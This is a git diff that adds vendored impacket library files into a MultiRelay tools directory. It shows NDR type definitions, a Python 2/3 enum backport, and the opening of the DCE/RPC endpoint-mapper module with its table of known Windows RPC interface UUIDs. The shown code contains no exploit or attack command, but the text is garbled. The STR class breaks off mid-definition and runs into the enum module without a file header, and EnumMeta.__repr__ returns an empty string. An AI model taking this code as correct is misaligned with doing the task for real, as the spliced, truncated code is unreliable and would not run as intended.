+ NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL
+
+DWORD = NDRULONG
+BOOL = NDRULONG
+UCHAR = NDRUSMALL
+SHORT = NDRSHORT
+NULL = NULL
+
+class LPDWORD(NDRPOINTER):
+ referent = (
+ ('Data', DWORD),
+ )
+
+class PSHORT(NDRPOINTER):
+ referent = (
+ ('Data', SHORT),
+ )
+
+class PBOOL(NDRPOINTER):
+ referent = (
+ ('Data', BOOL),
+ )
+
+class LPBYTE(NDRPOINTER):
+ referent = (
+ ('Data', NDRUniConformantArray),
+ )
+PBYTE = LPBYTE
+
+# 2.2.4 BOOLEAN
+BOOLEAN = NDRBOOLEAN
+
+# 2.2.6 BYTE
+BYTE = NDRUSMALL
+
+# 2.2.7 CHAR
+CHAR = NDRSMALL
+class PCHAR(NDRPOINTER):
+ referent = (
+ ('Data', CHAR),
+ )
+
+class WIDESTR(NDRUniFixedArray):
+ def getDataLen(self, data, offset=0):
+ return data.find(b'\x00\x00\x00', offset)+3-offset
+
+ def __setitem__(self, key, value):
+ if key == 'Data':
+ try:
+ self.fields[key] = value.encode('utf-16le')
+ except UnicodeDecodeError:
+ import sys
+ self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+
+ self.data = None # force recompute
+ else:
+ return NDR.__setitem__(self, key, value)
+
+ def __getitem__(self, key):
+ if key == 'Data':
+ return self.fields[key].decode('utf-16le')
+ else:
+ return NDR.__getitem__(self,key)
+
+class STR(NDRSTRUCT):
+ commonHdr = (
+ ('MaximumCount', ' 4)
+
+
+def _is_sunder(name):
+ """Returns True if a _sunder_ name, False otherwise."""
+ return (name[0] == name[-1] == '_' and
+ name[1:2] != '_' and
+ name[-2:-1] != '_' and
+ len(name) > 2)
+
+
+def _make_class_unpicklable(cls):
+ """Make the given class un-picklable."""
+ def _break_on_call_reduce(self):
+ raise TypeError('%r cannot be pickled' % self)
+ cls.__reduce__ = _break_on_call_reduce
+ cls.__module__ = ''
+
+
+class _EnumDict(dict):
+ """Track enum member order and ensure member names are not reused.
+
+ EnumMeta will use the names found in self._member_names as the
+ enumeration member names.
+
+ """
+ def __init__(self):
+ super(_EnumDict, self).__init__()
+ self._member_names = []
+
+ def __setitem__(self, key, value):
+ """Changes anything not dundered or not a descriptor.
+
+ If a descriptor is added with the same name as an enum member, the name
+ is removed from _member_names (this may leave a hole in the numerical
+ sequence of values).
+
+ If an enum member name is used twice, an error is raised; duplicate
+ values are not checked for.
+
+ Single underscore (sunder) names are reserved.
+
+ Note: in 3.x __order__ is simply discarded as a not necessary piece
+ leftover from 2.x
+
+ """
+ if pyver >= 3.0 and key == '__order__':
+ return
+ if _is_sunder(key):
+ raise ValueError('_names_ are reserved for future Enum use')
+ elif _is_dunder(key):
+ pass
+ elif key in self._member_names:
+ # descriptor overwriting an enum?
+ raise TypeError('Attempted to reuse key: %r' % key)
+ elif not _is_descriptor(value):
+ if key in self:
+ # enum overwriting a descriptor?
+ raise TypeError('Key already defined as: %r' % self[key])
+ self._member_names.append(key)
+ super(_EnumDict, self).__setitem__(key, value)
+
+
+# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until
+# EnumMeta finishes running the first time the Enum class doesn't exist. This
+# is also why there are checks in EnumMeta like `if Enum is not None`
+Enum = None
+
+
+class EnumMeta(type):
+ """Metaclass for Enum"""
+ @classmethod
+ def __prepare__(metacls, cls, bases):
+ return _EnumDict()
+
+ def __new__(metacls, cls, bases, classdict):
+ # an Enum class is final once enumeration items have been defined; it
+ # cannot be mixed with other types (int, float, etc.) if it has an
+ # inherited __new__ unless a new __new__ is defined (or the resulting
+ # class will fail).
+ if type(classdict) is dict:
+ original_dict = classdict
+ classdict = _EnumDict()
+ for k, v in original_dict.items():
+ classdict[k] = v
+
+ member_type, first_enum = metacls._get_mixins_(bases)
+ #if member_type is object:
+ # use_args = False
+ #else:
+ # use_args = True
+ __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
+ first_enum)
+ # save enum items into separate mapping so they don't get baked into
+ # the new class
+ members = dict((k, classdict[k]) for k in classdict._member_names)
+ for name in classdict._member_names:
+ del classdict[name]
+
+ # py2 support for definition order
+ __order__ = classdict.get('__order__')
+ if __order__ is None:
+ __order__ = classdict._member_names
+ if pyver < 3.0:
+ order_specified = False
+ else:
+ order_specified = True
+ else:
+ del classdict['__order__']
+ order_specified = True
+ if pyver < 3.0:
+ __order__ = __order__.replace(',', ' ').split()
+ aliases = [name for name in members if name not in __order__]
+ __order__ += aliases
+
+ # check for illegal enum names (any others?)
+ invalid_names = set(members) & set(['mro'])
+ if invalid_names:
+ raise ValueError('Invalid enum member name(s): %s' % (
+ ', '.join(invalid_names), ))
+
+ # create our new Enum type
+ enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
+ enum_class._member_names_ = [] # names in random order
+ enum_class._member_map_ = {} # name->value map
+ enum_class._member_type_ = member_type
+
+ # Reverse value->name map for hashable values.
+ enum_class._value2member_map_ = {}
+
+ # check for a __getnewargs__, and if not present sabotage
+ # pickling, since it won't work anyway
+ if (member_type is not object and
+ member_type.__dict__.get('__getnewargs__') is None
+ ):
+ _make_class_unpicklable(enum_class)
+
+ # instantiate them, checking for duplicates as we go
+ # we instantiate first instead of checking for duplicates first in case
+ # a custom __new__ is doing something funky with the values -- such as
+ # auto-numbering ;)
+ if __new__ is None:
+ __new__ = enum_class.__new__
+ for member_name in __order__:
+ value = members[member_name]
+ if not isinstance(value, tuple):
+ args = (value, )
+ else:
+ args = value
+ if member_type is tuple: # special case for tuple enums
+ args = (args, ) # wrap it one more time
+ if not use_args or not args:
+ enum_member = __new__(enum_class)
+ if not hasattr(enum_member, '_value_'):
+ enum_member._value_ = value
+ else:
+ enum_member = __new__(enum_class, *args)
+ if not hasattr(enum_member, '_value_'):
+ enum_member._value_ = member_type(*args)
+ value = enum_member._value_
+ enum_member._name_ = member_name
+ enum_member.__objclass__ = enum_class
+ enum_member.__init__(*args)
+ # If another member with the same value was already defined, the
+ # new member becomes an alias to the existing one.
+ for name, canonical_member in enum_class._member_map_.items():
+ if canonical_member.value == enum_member._value_:
+ enum_member = canonical_member
+ break
+ else:
+ # Aliases don't appear in member names (only in __members__).
+ enum_class._member_names_.append(member_name)
+ enum_class._member_map_[member_name] = enum_member
+ try:
+ # This may fail if value is not hashable. We can't add the value
+ # to the map, and by-value lookups for this value will be
+ # linear.
+ enum_class._value2member_map_[value] = enum_member
+ except TypeError:
+ pass
+
+ # in Python2.x we cannot know definition order, so go with value order
+ # unless __order__ was specified in the class definition
+ if not order_specified:
+ enum_class._member_names_ = [
+ e[0] for e in sorted(
+ [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],
+ key=lambda t: t[1]._value_
+ )]
+
+ # double check that repr and friends are not the mixin's or various
+ # things break (such as pickle)
+ if Enum is not None:
+ setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)
+ for name in ('__repr__', '__str__', '__format__'):
+ class_method = getattr(enum_class, name)
+ obj_method = getattr(member_type, name, None)
+ enum_method = getattr(first_enum, name, None)
+ if obj_method is not None and obj_method is class_method:
+ setattr(enum_class, name, enum_method)
+
+ # method resolution and int's are not playing nice
+ # Python's less than 2.6 use __cmp__
+
+ if pyver < 2.6:
+
+ if issubclass(enum_class, int):
+ setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))
+
+ elif pyver < 3.0:
+
+ if issubclass(enum_class, int):
+ for method in (
+ '__le__',
+ '__lt__',
+ '__gt__',
+ '__ge__',
+ '__eq__',
+ '__ne__',
+ '__hash__',
+ ):
+ setattr(enum_class, method, getattr(int, method))
+
+ # replace any other __new__ with our own (as long as Enum is not None,
+ # anyway) -- again, this is to support pickle
+ if Enum is not None:
+ # if the user defined their own __new__, save it before it gets
+ # clobbered in case they subclass later
+ if save_new:
+ setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
+ setattr(enum_class, '__new__', Enum.__dict__['__new__'])
+ return enum_class
+
+ def __call__(cls, value, names=None, module=None, type=None):
+ """Either returns an existing member, or creates a new enum class.
+
+ This method is used both when an enum class is given a value to match
+ to an enumeration member (i.e. Color(3)) and for the functional API
+ (i.e. Color = Enum('Color', names='red green blue')).
+
+ When used for the functional API: `module`, if set, will be stored in
+ the new class' __module__ attribute; `type`, if set, will be mixed in
+ as the first base class.
+
+ Note: if `module` is not set this routine will attempt to discover the
+ calling module by walking the frame stack; if this is unsuccessful
+ the resulting class will not be pickleable.
+
+ """
+ if names is None: # simple value lookup
+ return cls.__new__(cls, value)
+ # otherwise, functional API: we're creating a new Enum type
+ return cls._create_(value, names, module=module, type=type)
+
+ def __contains__(cls, member):
+ return isinstance(member, cls) and member.name in cls._member_map_
+
+ def __delattr__(cls, attr):
+ # nicer error message when someone tries to delete an attribute
+ # (see issue19025).
+ if attr in cls._member_map_:
+ raise AttributeError(
+ "%s: cannot delete Enum member." % cls.__name__)
+ super(EnumMeta, cls).__delattr__(attr)
+
+ def __dir__(self):
+ return (['__class__', '__doc__', '__members__', '__module__'] +
+ self._member_names_)
+
+ @property
+ def __members__(cls):
+ """Returns a mapping of member name->value.
+
+ This mapping lists all enum members, including aliases. Note that this
+ is a copy of the internal mapping.
+
+ """
+ return cls._member_map_.copy()
+
+ def __getattr__(cls, name):
+ """Return the enum member matching `name`
+
+ We use __getattr__ instead of descriptors or inserting into the enum
+ class' __dict__ in order to support `name` and `value` being both
+ properties for enum members (which live in the class' __dict__) and
+ enum members themselves.
+
+ """
+ if _is_dunder(name):
+ raise AttributeError(name)
+ try:
+ return cls._member_map_[name]
+ except KeyError:
+ raise AttributeError(name)
+
+ def __getitem__(cls, name):
+ return cls._member_map_[name]
+
+ def __iter__(cls):
+ return (cls._member_map_[name] for name in cls._member_names_)
+
+ def __reversed__(cls):
+ return (cls._member_map_[name] for name in reversed(cls._member_names_))
+
+ def __len__(cls):
+ return len(cls._member_names_)
+
+ def __repr__(cls):
+ return "" % cls.__name__
+
+ def __setattr__(cls, name, value):
+ """Block attempts to reassign Enum members.
+
+ A simple assignment to the class namespace only changes one of the
+ several possible ways to get an Enum member from the Enum class,
+ resulting in an inconsistent Enumeration.
+
+ """
+ member_map = cls.__dict__.get('_member_map_', {})
+ if name in member_map:
+ raise AttributeError('Cannot reassign members.')
+ super(EnumMeta, cls).__setattr__(name, value)
+
+ def _create_(cls, class_name, names=None, module=None, type=None):
+ """Convenience method to create a new Enum class.
+
+ `names` can be:
+
+ * A string containing member names, separated either with spaces or
+ commas. Values are auto-numbered from 1.
+ * An iterable of member names. Values are auto-numbered from 1.
+ * An iterable of (member name, value) pairs.
+ * A mapping of member name -> value.
+
+ """
+ metacls = cls.__class__
+ if type is None:
+ bases = (cls, )
+ else:
+ bases = (type, cls)
+ classdict = metacls.__prepare__(class_name, bases)
+ __order__ = []
+
+ # special processing needed for names?
+ if isinstance(names, str):
+ names = names.replace(',', ' ').split()
+ if isinstance(names, (tuple, list)) and isinstance(names[0], str):
+ names = [(e, i+1) for (i, e) in enumerate(names)]
+
+ # Here, names is either an iterable of (name, value) or a mapping.
+ for item in names:
+ if isinstance(item, str):
+ member_name, member_value = item, names[item]
+ else:
+ member_name, member_value = item
+ classdict[member_name] = member_value
+ __order__.append(member_name)
+ # only set __order__ in classdict if name/value was not from a mapping
+ if not isinstance(item, str):
+ classdict['__order__'] = ' '.join(__order__)
+ enum_class = metacls.__new__(metacls, class_name, bases, classdict)
+
+ # TODO: replace the frame hack if a blessed way to know the calling
+ # module is ever developed
+ if module is None:
+ try:
+ module = _sys._getframe(2).f_globals['__name__']
+ except (AttributeError, ValueError):
+ pass
+ if module is None:
+ _make_class_unpicklable(enum_class)
+ else:
+ enum_class.__module__ = module
+
+ return enum_class
+
+ @staticmethod
+ def _get_mixins_(bases):
+ """Returns the type for creating enum members, and the first inherited
+ enum class.
+
+ bases: the tuple of bases that was given to __new__
+
+ """
+ if not bases or Enum is None:
+ return object, Enum
+
+
+ # double check that we are not subclassing a class with existing
+ # enumeration members; while we're at it, see if any other data
+ # type has been mixed in so we can use the correct __new__
+ member_type = first_enum = None
+ for base in bases:
+ if (base is not Enum and
+ issubclass(base, Enum) and
+ base._member_names_):
+ raise TypeError("Cannot extend enumerations")
+ # base is now the last base in bases
+ if not issubclass(base, Enum):
+ raise TypeError("new enumerations must be created as "
+ "`ClassName([mixin_type,] enum_type)`")
+
+ # get correct mix-in type (either mix-in type of Enum subclass, or
+ # first base if last base is Enum)
+ if not issubclass(bases[0], Enum):
+ member_type = bases[0] # first data type
+ first_enum = bases[-1] # enum type
+ else:
+ for base in bases[0].__mro__:
+ # most common: (IntEnum, int, Enum, object)
+ # possible: (, ,
+ # , ,
+ # )
+ if issubclass(base, Enum):
+ if first_enum is None:
+ first_enum = base
+ else:
+ if member_type is None:
+ member_type = base
+
+ return member_type, first_enum
+
+ if pyver < 3.0:
+ @staticmethod
+ def _find_new_(classdict, member_type, first_enum):
+ """Returns the __new__ to be used for creating the enum members.
+
+ classdict: the class dictionary given to __new__
+ member_type: the data type whose __new__ will be used by default
+ first_enum: enumeration to check for an overriding __new__
+
+ """
+ # now find the correct __new__, checking to see of one was defined
+ # by the user; also check earlier enum classes in case a __new__ was
+ # saved as __member_new__
+ __new__ = classdict.get('__new__', None)
+ if __new__:
+ return None, True, True # __new__, save_new, use_args
+
+ N__new__ = getattr(None, '__new__')
+ O__new__ = getattr(object, '__new__')
+ if Enum is None:
+ E__new__ = N__new__
+ else:
+ E__new__ = Enum.__dict__['__new__']
+ # check all possibles for __member_new__ before falling back to
+ # __new__
+ for method in ('__member_new__', '__new__'):
+ for possible in (member_type, first_enum):
+ try:
+ target = possible.__dict__[method]
+ except (AttributeError, KeyError):
+ target = getattr(possible, method, None)
+ if target not in [
+ None,
+ N__new__,
+ O__new__,
+ E__new__,
+ ]:
+ if method == '__member_new__':
+ classdict['__new__'] = target
+ return None, False, True
+ if isinstance(target, staticmethod):
+ target = target.__get__(member_type)
+ __new__ = target
+ break
+ if __new__ is not None:
+ break
+ else:
+ __new__ = object.__new__
+
+ # if a non-object.__new__ is used then whatever value/tuple was
+ # assigned to the enum member name will be passed to __new__ and to the
+ # new enum member's __init__
+ if __new__ is object.__new__:
+ use_args = False
+ else:
+ use_args = True
+
+ return __new__, False, use_args
+ else:
+ @staticmethod
+ def _find_new_(classdict, member_type, first_enum):
+ """Returns the __new__ to be used for creating the enum members.
+
+ classdict: the class dictionary given to __new__
+ member_type: the data type whose __new__ will be used by default
+ first_enum: enumeration to check for an overriding __new__
+
+ """
+ # now find the correct __new__, checking to see of one was defined
+ # by the user; also check earlier enum classes in case a __new__ was
+ # saved as __member_new__
+ __new__ = classdict.get('__new__', None)
+
+ # should __new__ be saved as __member_new__ later?
+ save_new = __new__ is not None
+
+ if __new__ is None:
+ # check all possibles for __member_new__ before falling back to
+ # __new__
+ for method in ('__member_new__', '__new__'):
+ for possible in (member_type, first_enum):
+ target = getattr(possible, method, None)
+ if target not in (
+ None,
+ None.__new__,
+ object.__new__,
+ Enum.__new__,
+ ):
+ __new__ = target
+ break
+ if __new__ is not None:
+ break
+ else:
+ __new__ = object.__new__
+
+ # if a non-object.__new__ is used then whatever value/tuple was
+ # assigned to the enum member name will be passed to __new__ and to the
+ # new enum member's __init__
+ if __new__ is object.__new__:
+ use_args = False
+ else:
+ use_args = True
+
+ return __new__, save_new, use_args
+
+
+########################################################
+# In order to support Python 2 and 3 with a single
+# codebase we have to create the Enum methods separately
+# and then use the `type(name, bases, dict)` method to
+# create the class.
+########################################################
+temp_enum_dict = {}
+temp_enum_dict['__doc__'] = "Generic enumeration.\n\n Derive from this class to define new enumerations.\n\n"
+
+def __new__(cls, value):
+ # all enum instances are actually created during class construction
+ # without calling this method; this method is called by the metaclass'
+ # __call__ (i.e. Color(3) ), and by pickle
+ if type(value) is cls:
+ # For lookups like Color(Color.red)
+ value = value.value
+ #return value
+ # by-value search for a matching enum member
+ # see if it's in the reverse mapping (for hashable values)
+ try:
+ if value in cls._value2member_map_:
+ return cls._value2member_map_[value]
+ except TypeError:
+ # not there, now do long search -- O(n) behavior
+ for member in cls._member_map_.values():
+ if member.value == value:
+ return member
+ raise ValueError("%s is not a valid %s" % (value, cls.__name__))
+temp_enum_dict['__new__'] = __new__
+del __new__
+
+def __repr__(self):
+ return "<%s.%s: %r>" % (
+ self.__class__.__name__, self._name_, self._value_)
+temp_enum_dict['__repr__'] = __repr__
+del __repr__
+
+def __str__(self):
+ return "%s.%s" % (self.__class__.__name__, self._name_)
+temp_enum_dict['__str__'] = __str__
+del __str__
+
+def __dir__(self):
+ added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_']
+ return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior)
+temp_enum_dict['__dir__'] = __dir__
+del __dir__
+
+def __format__(self, format_spec):
+ # mixed-in Enums should use the mixed-in type's __format__, otherwise
+ # we can get strange results with the Enum name showing up instead of
+ # the value
+
+ # pure Enum branch
+ if self._member_type_ is object:
+ cls = str
+ val = str(self)
+ # mix-in branch
+ else:
+ cls = self._member_type_
+ val = self.value
+ return cls.__format__(val, format_spec)
+temp_enum_dict['__format__'] = __format__
+del __format__
+
+
+####################################
+# Python's less than 2.6 use __cmp__
+
+if pyver < 2.6:
+
+ def __cmp__(self, other):
+ if type(other) is self.__class__:
+ if self is other:
+ return 0
+ return -1
+ return NotImplemented
+ raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
+ temp_enum_dict['__cmp__'] = __cmp__
+ del __cmp__
+
+else:
+
+ def __le__(self, other):
+ raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
+ temp_enum_dict['__le__'] = __le__
+ del __le__
+
+ def __lt__(self, other):
+ raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
+ temp_enum_dict['__lt__'] = __lt__
+ del __lt__
+
+ def __ge__(self, other):
+ raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
+ temp_enum_dict['__ge__'] = __ge__
+ del __ge__
+
+ def __gt__(self, other):
+ raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
+ temp_enum_dict['__gt__'] = __gt__
+ del __gt__
+
+
+def __eq__(self, other):
+ if type(other) is self.__class__:
+ return self is other
+ return NotImplemented
+temp_enum_dict['__eq__'] = __eq__
+del __eq__
+
+def __ne__(self, other):
+ if type(other) is self.__class__:
+ return self is not other
+ return NotImplemented
+temp_enum_dict['__ne__'] = __ne__
+del __ne__
+
+def __getnewargs__(self):
+ return (self._value_, )
+temp_enum_dict['__getnewargs__'] = __getnewargs__
+del __getnewargs__
+
+def __hash__(self):
+ return hash(self._name_)
+temp_enum_dict['__hash__'] = __hash__
+del __hash__
+
+# _RouteClassAttributeToGetattr is used to provide access to the `name`
+# and `value` properties of enum members while keeping some measure of
+# protection from modification, while still allowing for an enumeration
+# to have members named `name` and `value`. This works because enumeration
+# members are not set directly on the enum class -- __getattr__ is
+# used to look them up.
+
+@_RouteClassAttributeToGetattr
+def name(self):
+ return self._name_
+temp_enum_dict['name'] = name
+del name
+
+@_RouteClassAttributeToGetattr
+def value(self):
+ return self._value_
+temp_enum_dict['value'] = value
+del value
+
+Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
+del temp_enum_dict
+
+# Enum has now been created
+###########################
+
+class IntEnum(int, Enum):
+ """Enum where members are also (and must be) ints"""
+
+
+def unique(enumeration):
+ """Class decorator that ensures only unique members exist in an enumeration."""
+ duplicates = []
+ for name, member in enumeration.__members__.items():
+ if name != member.name:
+ duplicates.append((name, member.name))
+ if duplicates:
+ duplicate_names = ', '.join(
+ ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
+ )
+ raise ValueError('duplicate names found in %r: %s' %
+ (enumeration, duplicate_names)
+ )
+ return enumeration
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py
new file mode 100644
index 0000000..d795d36
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py
@@ -0,0 +1,1383 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-RPCE]-C706 Interface implementation for the remote portmapper
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+import socket
+from struct import unpack
+from six import b
+
+from impacket.uuid import uuidtup_to_bin, bin_to_string
+from impacket.dcerpc.v5 import transport
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantVaryingArray, NDRUniVaryingArray, \
+ NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import UUID, LPBYTE, PUUID, ULONG, USHORT
+from impacket.structure import Structure
+from impacket.dcerpc.v5.ndr import NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import LOG
+
+MSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'))
+
+class DCERPCSessionError(DCERPCException):
+ error_messages = {}
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+ self.error_code = packet['status']
+
+ def __str__( self ):
+ key = self.error_code
+ if key in self.error_messages:
+ error_msg_short = self.error_messages[key]
+ return 'EPM SessionError: code: 0x%x - %s ' % (self.error_code, error_msg_short)
+ else:
+ return 'EPM SessionError: unknown error code: %s' % (str(self.error_code))
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+KNOWN_UUIDS = {
+b"\xb0\x01\x52\x97\xca\x59\xd0\x11\xa8\xd5\x00\xa0\xc9\x0d\x80\x51\x01\x00": "rpcss.dll",
+b"\xf1\x8f\x37\xc9\xf7\x16\xd0\x11\xa0\xb2\x00\xaa\x00\x61\x42\x6a\x01\x00": "pstorsvc.dll",
+b"\xd4\xa7\x72\x0d\x48\x61\xd1\x11\xb4\xaa\x00\xc0\x4f\xb6\x6e\xa0\x01\x00": "cryptsvc.dll",
+b"\x40\x4e\x9f\x8d\x3d\xa0\xce\x11\x8f\x69\x08\x00\x3e\x30\x05\x1b\x01\x00": "services.exe",
+b"\xc5\x86\x5a\xda\xc2\x12\x43\x49\xab\x30\x7f\x74\xa8\x13\xd8\x53\x01\x00": "regsvc.dll",
+b"\x29\x07\x8a\xfb\x04\x2d\x58\x46\xbe\x93\x27\xb4\xad\x55\x3f\xac\x01\x00": "lsass.exe",
+b"\x04\xf7\xd9\x52\xc6\xd3\x48\x47\xad\x11\x25\x50\x20\x9e\x80\xaf\x00\x00": "IMEPADSM.DLL",
+b"\xce\xad\x21\xc4\xb2\xa0\x0d\x48\x84\x18\x98\x44\x95\xb3\x2d\x5f\x01\x00": "SLsvc.exe",
+b"\x14\xb5\xfb\xd3\x3b\x0e\xcb\x11\x8f\xad\x08\x00\x2b\x1d\x29\xc3\x01\x00": "locator.exe",
+b"\x6f\x40\x1c\xf6\x60\xbd\x94\x41\x95\x65\xbf\xed\xd5\x25\x6f\x70\x01\x00": "p2phost.exe",
+b"\x72\x33\x3d\xc1\x20\xcc\x49\x44\x9b\x23\x8c\xc8\x27\x1b\x38\x85\x01\x00": "rpcrt4.dll",
+b"\x70\xfe\x5a\xd9\xd5\xa6\x59\x42\x82\x2e\x2c\x84\xda\x1d\xdb\x0d\x01\x00": "wininit.exe",
+b"\x6a\x07\x2d\x55\x29\xcb\x44\x4e\x8b\x6a\xd1\x5e\x59\xe2\xc0\xaf\x01\x00": "iphlpsvc.dll",
+b"\x95\x4f\x25\xd4\xc3\x08\xcc\x4f\xb2\xa6\x0b\x65\x13\x77\xa2\x9d\x01\x00": "wwansvc.dll",
+b"\x43\x9a\x89\x11\x68\x2b\x76\x4a\x92\xe3\xa3\xd6\xad\x8c\x26\xce\x01\x00": "lsm.exe",
+b"\xb4\x33\x6f\x26\xc1\xc7\xd1\x4b\x8f\x52\xdd\xb8\xf2\x21\x4e\xa9\x01\x00": "wlansvc.dll",
+b"\x68\x9d\xcb\x2a\x34\xb4\x3e\x4b\xb9\x66\xe0\x6b\x4b\x3a\x84\xcb\x01\x00": "bthserv.dll",
+b"\xd0\x4c\x67\x57\x00\x52\xce\x11\xa8\x97\x08\x00\x2b\x2e\x9c\x6d\x01\x00": "llssrv.exe",
+b"\x52\x44\x7d\x64\x33\x9f\x18\x4a\xb2\xbe\xc5\xc0\xe9\x20\xe9\x4e\x01\x00": "pla.dll",
+b"\xc8\x9b\x3b\xde\xf7\xbe\x78\x45\xa0\xde\xf0\x89\x04\x84\x42\xdb\x01\x00": "audiodg.exe",
+b"\xd1\x51\xa9\xbf\x0e\x2f\xd3\x11\xbf\xd1\x00\xc0\x4f\xa3\x49\x0a\x01\x00": "aqueue.dll",
+b"\x84\x55\x66\x1e\xfe\x40\x50\x44\x8f\x6e\x80\x23\x62\x39\x96\x94\x01\x00": "lsm.exe",
+b"\x41\x76\x17\xaa\x9b\xfc\xbd\x41\x80\xff\xf9\x64\xa7\x01\x59\x6f\x01\x00": "tssdis.exe",
+b"\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17\x00\xdd\x01\x06\x62\xda\x01\x00": "msdtcprx.dll",
+b"\x51\xb9\x6b\xfd\x30\xc8\x34\x47\xbf\x2c\x18\xba\x6e\xc7\xab\x49\x01\x00": "iscsiexe.dll",
+b"\x68\xff\x1d\x62\x39\x3c\x6c\x4c\xaa\xe3\xe6\x8e\x2c\x65\x03\xad\x01\x00": "wzcsvc.dll",
+b"\x56\xcc\x35\x94\x9c\x1d\x24\x49\xac\x7d\xb6\x0a\x2c\x35\x20\xe1\x01\x00": "sppsvc.exe",
+b"\xf0\xe4\x9c\x36\xdc\x0f\xd3\x11\xbd\xe8\x00\xc0\x4f\x8e\xee\x78\x01\x00": "profmap.dll",
+b"\x6a\x28\x19\x39\x0c\xb1\xd0\x11\x9b\xa8\x00\xc0\x4f\xd9\x2e\xf5\x00\x00": "lsasrv.dll",
+b"\x80\x2b\xd1\x76\x67\x34\xd3\x11\x91\xff\x00\x90\x27\x2f\x9e\xa3\x01\x00": "mqqm.dll",
+b"\x72\xfe\x0f\x8d\x52\xd2\xd0\x11\xbf\x8f\x00\xc0\x4f\xd9\x12\x6b\x01\x00": "cryptsvc.dll",
+b"\x86\xd4\xdc\x68\x9e\x66\xd1\x11\xab\x0c\x00\xc0\x4f\xc2\xdc\xd2\x01\x00": "ismserv.exe",
+b"\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00\x00": "rpcss.dll",
+b"\x06\x91\x01\x24\x03\xa2\x42\x46\xb8\x8d\x82\xda\xe9\x15\x89\x29\x01\x00": "authui.dll",
+b"\x60\xa7\xa4\x5c\xb1\xeb\xcf\x11\x86\x11\x00\xa0\x24\x54\x20\xed\x01\x00": "termsrv.dll",
+b"\x4d\xdd\x73\x34\x88\x2e\x06\x40\x9c\xba\x22\x57\x09\x09\xdd\x10\x05\x01": "winhttp.dll",
+b"\xb2\xb8\x7d\xb9\x63\x4c\xcf\x11\xbf\xf6\x08\x00\x2b\xe2\x3f\x2f\x02\x00": "clussvc.exe",
+b"\x95\x1f\x51\x33\x84\x5b\xcc\x4d\xb6\xcc\x3f\x4b\x21\xda\x53\xe1\x01\x00": "ubpm.dll",
+b"\x78\xb2\xeb\x05\x14\xe1\xc1\x4e\xa5\xa3\x09\x61\x53\xf3\x00\xe4\x01\x01": "tsgqec.dll",
+b"\x24\xe4\xfb\x63\x29\x20\xd1\x11\x8d\xb8\x00\xaa\x00\x4a\xbd\x5e\x01\x00": "Sens.dll",
+b"\x36\xa0\x67\x07\x22\x0d\xaa\x48\xba\x69\xb6\x19\x48\x0f\x38\xcb\x01\x00": "pcasvc.dll",
+b"\x20\x32\x5f\x2f\x26\xc1\x76\x10\xb5\x49\x07\x4d\x07\x86\x19\xda\x01\x00": "netdde.exe",
+b"\x30\xa0\xb3\xfd\x5f\x06\xd1\x11\xbb\x9b\x00\xa0\x24\xea\x55\x25\x01\x00": "mqqm.dll",
+b"\x80\x7a\xdf\x77\x98\xf2\xd0\x11\x83\x58\x00\xa0\x24\xc4\x80\xa8\x01\x00": "mqdssrv.dll",
+b"\x03\x6d\x71\x98\xac\x89\xc7\x44\xbb\x8c\x28\x58\x24\xe5\x1c\x4a\x01\x00": "srvsvc.dll",
+b"\xc8\xad\x32\x4f\x52\x60\x04\x4a\x87\x01\x29\x3c\xcf\x20\x96\xf0\x01\x00": "sspisrv.dll",
+b"\x90\x38\xa9\x65\xb9\xfa\xa3\x43\xb2\xa5\x1e\x33\x0a\xc2\x8f\x11\x02\x00": "dnsrslvr.dll",
+b"\x32\xf5\x03\xc5\x3a\x44\x69\x4c\x83\x00\xcc\xd1\xfb\xdb\x38\x39\x01\x00": "MpSvc.dll",
+b"\x46\x9f\x3b\xc3\x88\x20\xbc\x4d\x97\xe3\x61\x25\xf1\x27\x66\x1c\x01\x00": "nlasvc.dll",
+b"\xa0\xb3\x02\xa0\xb7\xc9\xd1\x11\xae\x88\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "wlnotify.dll",
